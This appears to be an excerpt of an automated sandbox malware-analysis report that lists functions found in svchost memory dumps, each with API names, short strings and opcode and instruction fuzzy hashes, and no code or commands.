                                                    • Instruction Fuzzy Hash: 56F04461721B05C7EF50CB2CAC483595320EB9B765F541225BA6A899E4EF38C2448741
                                                    Function 000002A3F0663044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CombinePath
                                                    • String ID: \\.\pipe\
                                                    • API String ID: 3422762182-91387939
                                                    • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                    • Instruction ID: bc7fcf44eccac469d712f6677f5295184d23beb7ce9fd1912fc011b3c1582562
                                                    • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                    • Instruction Fuzzy Hash: 35F05E20B24B9087EE84CB1BBD081196261EB5BFD0F046130FE468BF58EE38C649C701
                                                    Function 000002A3F06650D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CurrentThread
                                                    • String ID:
                                                    • API String ID: 2882836952-0
                                                    • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                    • Instruction ID: 1a5c3ceabbb9674ab88b816016c5392cd132a216a6156abeb41612a421397731
                                                    • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                    • Instruction Fuzzy Hash: 8902BB32619B848ADBA0CB59E89535EB7A0F3D6794F100125FA8E87B68EF7CC544CB01
                                                    Function 000002A3F0665710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CurrentThread
                                                    • String ID:
                                                    • API String ID: 2882836952-0
                                                    • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                    • Instruction ID: fdf0353c2c9d7431a73655fa855ee1d883f357c26d152c9830ae0b22cfb9d9d6
                                                    • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                    • Instruction Fuzzy Hash: CF619136A29644CBEAA0CB19E95931E77E4F396784F100125F68D8BF64EF78C540CB01
                                                    Function 000002A3EFFD3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3039339786.000002A3EFFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3EFFC0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3effc0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: _set_statfp
                                                    • String ID:
                                                    • API String ID: 1156100317-0
                                                    • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                    • Instruction ID: b3d2515fd7531a192da7560432244ddb1d5725737d85a7ce7cb71133a17b834d
                                                    • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                    • Instruction Fuzzy Hash: 3E11A762710A1BD3FA549728E74D36911C06F5BBB4F48472BBB66862D6CEF6CB434202
                                                    Function 000002A3F0674104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: _set_statfp
                                                    • String ID:
                                                    • API String ID: 1156100317-0
                                                    • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                    • Instruction ID: 778c29c2b52a37e8828e8148e915df3a772d082812edea363ef07373fae80013
                                                    • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                    • Instruction Fuzzy Hash: E4116D22F34A501BF6E5A56CDC5D3751144EB7B3B8E890634B97686ED6EF34CAC14203
                                                    Function 000002A3EFFCF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3039339786.000002A3EFFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3EFFC0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3effc0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                    • API String ID: 3215553584-4202648911
                                                    • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                    • Instruction ID: 72e7a858243a0862991be92073fd25fa4d2ae0b65c3be1701e8c213c550465a5
                                                    • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                    • Instruction Fuzzy Hash: 0861922670026043F769CB65E74C369AAA0EF83B50F554417FA0A977E4DFF4CB47822A
                                                    Function 000002A3F066AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CallEncodePointerTranslator
                                                    • String ID: MOC$RCC
                                                    • API String ID: 3544855599-2084237596
                                                    • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                    • Instruction ID: 0c64597300c946a2c78553bcffee072166d80c1db9bdc91f256f0f9a0b87a364
                                                    • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                    • Instruction Fuzzy Hash: EA617D32B10B448BE750DF69D84439DB7A0F356B88F044226EF495BB99EF38C655CB01
                                                    Function 000002A3EFFCA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3039339786.000002A3EFFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3EFFC0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3effc0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                    • String ID: csm$csm
                                                    • API String ID: 3896166516-3733052814
                                                    • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                    • Instruction ID: 7d3f4da836a6d3a3b3a2b9affbb5badf6e48be98e05b9c20b87d266e2fd35715
                                                    • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                    • Instruction Fuzzy Hash: 3A51B3322002A0CBEB74CF65966835877A0FF56B84F144117EA49D7BC5CFB9E652C70A
                                                    Function 000002A3F066AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                    • String ID: csm$csm
                                                    • API String ID: 3896166516-3733052814
                                                    • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                    • Instruction ID: 6f1cb0b0e2f77e083062affd172c0089a59e910c1f2d4a4a0f9650168a2628ac
                                                    • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                    • Instruction Fuzzy Hash: 7C518272A203808FEBA4CF19994835DB7A0F767B84F144125FA598BF95EF38D650CB02
                                                    Function 000002A3EFFC8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3039339786.000002A3EFFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3EFFC0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3effc0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                    • String ID: csm$f
                                                    • API String ID: 3242871069-629598281
                                                    • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                    • Instruction ID: 18d4462e912e04e262cb9d845cbb99dddd9bdd6a83f29b90a56fac2c5e1f1e45
                                                    • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                    • Instruction Fuzzy Hash: 3251D13270162087DB14CF15D648B283795FB42FA8F168427EA0683788EFF5CB42C70A
                                                    Function 000002A3EFFC83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3039339786.000002A3EFFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3EFFC0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3effc0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                    • String ID: csm$f
                                                    • API String ID: 3242871069-629598281
                                                    • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                    • Instruction ID: 638603215c4bd4605fef7f0d1933761329d4d304d81e6a47645db0f5dcc0997b
                                                    • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                    • Instruction Fuzzy Hash: 35318C7130165087E714DF11E948B1937A4FB42B98F168417BE5A87788DFB9CB42C70A
                                                    Function 000002A3F0672058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                    • String ID:
                                                    • API String ID: 2718003287-0
                                                    • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                    • Instruction ID: 1dea74a7b9dd16eb4baa4bb49ba0bef5543a7e9b7916fd59b1bcb17493166bde
                                                    • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                    • Instruction Fuzzy Hash: F9D1D172B24A808EE751CF79D84839C3BB1F366798F144226EE5997F99EE34C606C341
                                                    Function 000002A3F06614A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Free
                                                    • String ID:
                                                    • API String ID: 3168794593-0
                                                    • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                    • Instruction ID: d536798ee46fa44b5ad918a9dcf1e87bae4019f298dbc0d8180429603494c22b
                                                    • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                    • Instruction Fuzzy Hash: 13014C32A20A90CBDB44DF6AED0C14A67A0F79AF81F484435FA4987B29EE38C251C741
                                                    Function 000002A3F0672980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ConsoleErrorLastMode
                                                    • String ID:
                                                    • API String ID: 953036326-0
                                                    • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                    • Instruction ID: a4cb1103299b726bc7b01eccba19e47c4a24c67d0d3a46935793449ef8735077
                                                    • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                    • Instruction Fuzzy Hash: A491A662F206518EF7A1DF6D9C4836D2BA0F727B8CF144125EE0697E95EE34C685C702
                                                    Function 000002A3F0667960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                    • String ID:
                                                    • API String ID: 2933794660-0
                                                    • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                    • Instruction ID: 64750482dc4921f28b12e3224374007b2b1ae6a2ef3d88e21d4456c50efc5c58
                                                    • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                    • Instruction Fuzzy Hash: 70112421B20F018AEF40CF64EC583A833A4F76A758F440D31FA6D86B54EF78C2948341
                                                    Function 000002A3F066253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID: \\.\pipe\
                                                    • API String ID: 3081899298-91387939
                                                    • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                    • Instruction ID: fb96a1d8bf94e82a1d2f4f61f31f1e99a0b6281a65b0fdd7fc554e0c5c89d442
                                                    • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                    • Instruction Fuzzy Hash: BF719336B20B824BD7A4DE299C487AD6A94F3A7788F440035ED099BF89EE35C7458701
                                                    Function 000002A3EFFC9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3039339786.000002A3EFFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3EFFC0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3effc0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CallTranslator
                                                    • String ID: MOC$RCC
                                                    • API String ID: 3163161869-2084237596
                                                    • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                    • Instruction ID: 1c071c4e189e1926709cb0ed332f7ab93af7b290c7f773ceed20fa96e7bdadd9
                                                    • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                    • Instruction Fuzzy Hash: 3C617633600B948AEB20DF65D18439D7BA0FB49B88F044217EF4957B98EFB8D296C705
                                                    Function 000002A3F0662330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID: \\.\pipe\
                                                    • API String ID: 3081899298-91387939
                                                    • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                    • Instruction ID: 5f936f7cd74c6ad8cabcdb3786854e477f79e51e7e3fe2a465b702ceea4c6f09
                                                    • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                    • Instruction Fuzzy Hash: D351E722B24B828BE7B4CF2EA85C36E5691F3A7744F440135ED4A87F49EE39C6448742
                                                    Function 000002A3F06726F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastWrite
                                                    • String ID: U
                                                    • API String ID: 442123175-4171548499
                                                    • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                    • Instruction ID: 4a4f14ede015f19fba4b8dc1191ceb6a241eb7a7a156b13a3e921accdb9fad5b
                                                    • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                    • Instruction Fuzzy Hash: 4041A472B24A418ADB60CF29E84839967A0F7AA794F404035FE4DC7B94EF7CC645C741
                                                    Function 000002A3F06694A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFileHeaderRaise
                                                    • String ID: csm
                                                    • API String ID: 2573137834-1018135373
                                                    • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                    • Instruction ID: 4dfaae02607e1d63d71d13f1f569e1bfbbce690b7281460ac2c766a79d4aa6aa
                                                    • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                    • Instruction Fuzzy Hash: 44113032614B4086EBA1CF19F84435977E5F79AB94F584220EE8D4BB59EF3CC655C700
                                                    Function 000002A3EFFC7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3039339786.000002A3EFFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3EFFC0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3effc0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: __std_exception_copy
                                                    • String ID: ierarchy Descriptor'$riptor at (
                                                    • API String ID: 592178966-758928094
                                                    • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                    • Instruction ID: 537a0299432303b2994cf101a968846695946c7fbee4695c8a398a611903422e
                                                    • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                    • Instruction Fuzzy Hash: 65E08661740B44D1DF02CF22E94429833A0DF59B68F889123A95C46311FF78D3EAC302
                                                    Function 000002A3EFFC73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3039339786.000002A3EFFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3EFFC0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3effc0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: __std_exception_copy
                                                    • String ID: Locator'$riptor at (
                                                    • API String ID: 592178966-4215709766
                                                    • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                    • Instruction ID: 3fa43d97622781504111e28302cccdffe62b838d3364dff2f09d1e1dee9b6f76
                                                    • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                    • Instruction Fuzzy Hash: DCE08661740B44C5DF01CF21D5402987360EF59B58F889123D94C46311FF78D2E6C301
                                                    Function 000002A3F0661BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocFree
                                                    • String ID:
                                                    • API String ID: 756756679-0
                                                    • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                    • Instruction ID: 899d41f3a461e795506a272869949aa2b30dded974880c644d390ca07638d0fa
                                                    • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                    • Instruction Fuzzy Hash: DC116325B21B448AEA84DB5EA80C22D67A1F79BFC0F584035EE4D9BB65EE38D5419301
                                                    Function 000002A3F0661268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$AllocProcess
                                                    • String ID:
                                                    • API String ID: 1617791916-0
                                                    • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                    • Instruction ID: 11941aba65ac1e048ab5c377d395697b824e5f1c455e2688e9b7b208c8c371a4
                                                    • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                    • Instruction Fuzzy Hash: B4E03935B216048BEB44CB6AD80C34A36E1EB9AB06F848024990947751FF7D8599C751